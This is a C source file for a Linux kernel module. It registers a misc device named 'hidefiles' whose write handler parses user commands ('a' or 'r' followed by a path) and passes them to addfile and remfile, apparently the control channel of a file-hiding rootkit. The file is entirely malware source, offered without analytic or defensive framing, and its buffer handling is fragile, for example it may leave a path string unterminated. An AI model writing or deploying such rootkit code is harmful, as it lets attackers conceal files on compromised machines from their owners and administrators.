#include "cdev.h"

#define DEV_MAX 512

static struct file_operations dev_fops = {
	.write = dev_write,
};

struct miscdevice dev_misc_device = {
	.minor = MISC_DYNAMIC_MINOR,
	.name = "hidefiles",
	.fops = &dev_fops
};

ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp)
{
	char temp_dev_file[DEV_MAX+1], new_dev_file[DEV_MAX];
	int i, n;
	memset(new_dev_file, 0, DEV_MAX);
	memset(temp_dev_file, 0, DEV_MAX+1);
	if(count > DEV_MAX){
		if(copy_from_user(temp_dev_file,buff,DEV_MAX) != 0)
			printk("Userspace -> kernel copy failed!\n");
		else {
			temp_dev_file[DEV_MAX] = '\0';
			for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
				new_dev_file[n] = temp_dev_file[i];
			}
			if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
				addfile(new_dev_file);
			} else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
				remfile(new_dev_file);
			}
		}
		return DEV_MAX;
	} else {
		if(copy_from_user(temp_dev_file,buff,count) != 0)
			printk("Userspace -> kernel copy failed!\n");
		else {
			for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
				new_dev_file[n] = temp_dev_file[i];
			}
			if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
				addfile(new_dev_file);
			} else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
				remfile(new_dev_file);
			}
		}
		return count;
	}
}
